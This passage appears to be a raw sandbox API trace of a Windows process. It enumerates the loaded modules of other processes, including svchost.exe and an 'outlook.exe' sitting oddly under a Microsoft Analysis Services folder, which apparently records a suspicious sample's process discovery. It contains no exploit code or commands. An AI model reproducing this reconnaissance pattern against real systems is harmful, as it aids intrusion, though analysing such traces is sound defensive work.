lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0076.890] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0076.892] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x25b2d30, cb=0x18 | out: lpmodinfo=0x25b2d30*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0076.894] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0076.896] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0076.898] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x25b4f00, cb=0x18 | out: lpmodinfo=0x25b4f00*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0076.900] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0076.902] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0076.903] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd980000, lpmodinfo=0x25b70c0, cb=0x18 | out: lpmodinfo=0x25b70c0*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0076.905] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd980000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0076.907] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd980000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0076.909] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc80000, lpmodinfo=0x25b9280, cb=0x18 | out: lpmodinfo=0x25b9280*(lpBaseOfDll=0x7fefcc80000, SizeOfImage=0xd000, EntryPoint=0x7fefcc81348)) returned 1 [0076.912] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc80000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="pcwum.DLL") returned 0x9 [0076.915] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc80000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\pcwum.DLL" (normalized: "c:\\windows\\system32\\pcwum.dll")) returned 0x1d [0076.917] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefca40000, lpmodinfo=0x25bb440, cb=0x18 | out: lpmodinfo=0x25bb440*(lpBaseOfDll=0x7fefca40000, SizeOfImage=0x81000, EntryPoint=0x7fefca4cec8)) returned 1 [0076.919] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefca40000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="rpcss.dll") returned 0x9 [0076.921] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefca40000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")) returned 0x1d [0076.923] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x25bd600, cb=0x18 | out: lpmodinfo=0x25bd600*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0076.926] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0076.928] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0076.930] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x25bf7c0, cb=0x18 | out: lpmodinfo=0x25bf7c0*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0076.932] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0076.934] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0076.937] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x25c1bb0, cb=0x18 | out: lpmodinfo=0x25c1bb0*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0076.939] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0076.941] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0076.944] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb800000, lpmodinfo=0x25c3d70, cb=0x18 | out: lpmodinfo=0x25c3d70*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0076.946] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb800000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0076.949] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb800000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0076.951] GetModuleInformation (in: hProcess=0x218, hModule=0x7feffae0000, lpmodinfo=0x25c5f30, cb=0x18 | out: lpmodinfo=0x25c5f30*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0076.953] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feffae0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0076.956] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feffae0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0076.959] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9ca0000, lpmodinfo=0x25c80f0, cb=0x18 | out: lpmodinfo=0x25c80f0*(lpBaseOfDll=0x7fef9ca0000, SizeOfImage=0x32000, EntryPoint=0x7fef9cbca90)) returned 1 [0076.962] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9ca0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wmidcprv.dll") returned 0xc [0076.964] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9ca0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmidcprv.dll" (normalized: "c:\\windows\\system32\\wbem\\wmidcprv.dll")) returned 0x25 [0076.967] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9bc0000, lpmodinfo=0x25ca2c8, cb=0x18 | out: lpmodinfo=0x25ca2c8*(lpBaseOfDll=0x7fef9bc0000, SizeOfImage=0xd3000, EntryPoint=0x7fef9c38b00)) returned 1 [0076.969] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9bc0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="FastProx.dll") returned 0xc [0076.972] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9bc0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\FastProx.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")) returned 0x25 [0076.975] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9e20000, lpmodinfo=0x25cc4a0, cb=0x18 | out: lpmodinfo=0x25cc4a0*(lpBaseOfDll=0x7fef9e20000, SizeOfImage=0x77000, EntryPoint=0x7fef9e5e7f0)) returned 1 [0076.977] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9e20000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wbemcomn2.DLL") returned 0xd [0076.980] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9e20000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn2.DLL" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")) returned 0x21 [0076.983] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd1e0000, lpmodinfo=0x25ce670, cb=0x18 | out: lpmodinfo=0x25ce670*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0076.986] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0076.988] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0076.991] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x25d0830, cb=0x18 | out: lpmodinfo=0x25d0830*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0076.994] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0076.996] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0076.999] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x25d29f0, cb=0x18 | out: lpmodinfo=0x25d29f0*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0077.002] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0077.005] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0077.008] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b90000, lpmodinfo=0x25d4ba0, cb=0x18 | out: lpmodinfo=0x25d4ba0*(lpBaseOfDll=0x7fef9b90000, SizeOfImage=0x27000, EntryPoint=0x7fef9b911a0)) returned 1 [0077.010] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b90000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="NTDSAPI.dll") returned 0xb [0077.013] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b90000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NTDSAPI.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")) returned 0x1f [0077.016] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b80000, lpmodinfo=0x25d6d60, cb=0x18 | out: lpmodinfo=0x25d6d60*(lpBaseOfDll=0x7fef9b80000, SizeOfImage=0xe000, EntryPoint=0x7fef9b85500)) returned 1 [0077.019] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b80000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wbemprox.dll") returned 0xc [0077.022] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b80000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")) returned 0x25 [0077.025] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x25d8f38, cb=0x18 | out: lpmodinfo=0x25d8f38*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0077.028] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0077.031] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0077.033] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x25db0f8, cb=0x18 | out: lpmodinfo=0x25db0f8*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0077.037] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0077.040] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0077.044] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef98a0000, lpmodinfo=0x25dd2b8, cb=0x18 | out: lpmodinfo=0x25dd2b8*(lpBaseOfDll=0x7fef98a0000, SizeOfImage=0x13000, EntryPoint=0x7fef98a1d80)) returned 1 [0077.047] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef98a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wbemsvc.dll") returned 0xb [0077.050] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef98a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")) returned 0x24 [0077.053] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9780000, lpmodinfo=0x25df488, cb=0x18 | out: lpmodinfo=0x25df488*(lpBaseOfDll=0x7fef9780000, SizeOfImage=0x21000, EntryPoint=0x7fef97903b0)) returned 1 [0077.056] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9780000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wmiutils.dll") returned 0xc [0077.059] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9780000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")) returned 0x25 [0077.063] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd830000, lpmodinfo=0x25e1660, cb=0x18 | out: lpmodinfo=0x25e1660*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0077.066] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0077.070] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0077.073] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9e0000, lpmodinfo=0x25e3830, cb=0x18 | out: lpmodinfo=0x25e3830*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0077.077] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0077.080] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0077.083] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd820000, lpmodinfo=0x25e59f0, cb=0x18 | out: lpmodinfo=0x25e59f0*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0077.087] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd820000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0077.090] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd820000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0077.093] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbb00000, lpmodinfo=0x25e7bc8, cb=0x18 | out: lpmodinfo=0x25e7bc8*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0077.096] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbb00000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0077.100] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbb00000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0077.112] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xba8) returned 0x218 [0077.112] EnumProcessModules (in: hProcess=0x218, lphModule=0x25eb2b8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25eb2b8, lpcbNeeded=0x23ee40) returned 1 [0077.113] GetModuleInformation (in: hProcess=0x218, hModule=0x1280000, lpmodinfo=0x25eb528, cb=0x18 | out: lpmodinfo=0x25eb528*(lpBaseOfDll=0x1280000, SizeOfImage=0x17000, EntryPoint=0x12814a1)) returned 1 [0077.113] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x1280000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="outlook.exe") returned 0xb [0077.114] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x1280000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Microsoft Analysis Services\\outlook.exe" (normalized: "c:\\program files (x86)\\microsoft analysis services\\outlook.exe")) returned 0x3e [0077.114] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25ed760, cb=0x18 | out: lpmodinfo=0x25ed760*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0077.114] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0077.115] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0077.115] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x25ef920, cb=0x18 | out: lpmodinfo=0x25ef920*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0077.115] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0077.116] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0077.116] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x25f1af8, cb=0x18 | out: lpmodinfo=0x25f1af8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0077.117] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0077.117] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0077.118] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x25f3cc8, cb=0x18 | out: lpmodinfo=0x25f3cc8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0077.118] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0077.119] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0077.119] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4b8) returned 0x218 [0077.119] EnumProcessModules (in: hProcess=0x218, lphModule=0x25f63e8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25f63e8, lpcbNeeded=0x23ee40) returned 1 [0077.124] EnumProcessModules (in: hProcess=0x218, lphModule=0x25f6600, cb=0x400, lpcbNeeded=0x23ee40 | out: lphModule=0x25f6600, lpcbNeeded=0x23ee40) returned 1 [0077.128] GetModuleInformation (in: hProcess=0x218, hModule=0xff760000, lpmodinfo=0x25f6a70, cb=0x18 | out: lpmodinfo=0x25f6a70*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0077.128] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff760000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0077.129] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff760000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0077.129] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25f8c68, cb=0x18 | out: lpmodinfo=0x25f8c68*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0077.130] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0077.130] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0077.130] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x25fae28, cb=0x18 | out: lpmodinfo=0x25fae28*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0077.131] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0077.131] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0077.132] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x25fcff8, cb=0x18 | out: lpmodinfo=0x25fcff8*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0077.132] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0077.132] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0077.133] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x25ff1c8, cb=0x18 | out: lpmodinfo=0x25ff1c8*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0077.133] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0077.134] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0077.135] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x26013e0, cb=0x18 | out: lpmodinfo=0x26013e0*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0077.135] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0077.136] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0077.136] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x26035a0, cb=0x18 | out: lpmodinfo=0x26035a0*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0077.137] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0077.138] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0077.138] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x2605760, cb=0x18 | out: lpmodinfo=0x2605760*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0077.139] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0077.140] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0077.141] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x2607920, cb=0x18 | out: lpmodinfo=0x2607920*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0077.142] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0077.142] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0077.143] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x2609b90, cb=0x18 | out: lpmodinfo=0x2609b90*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0077.144] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, 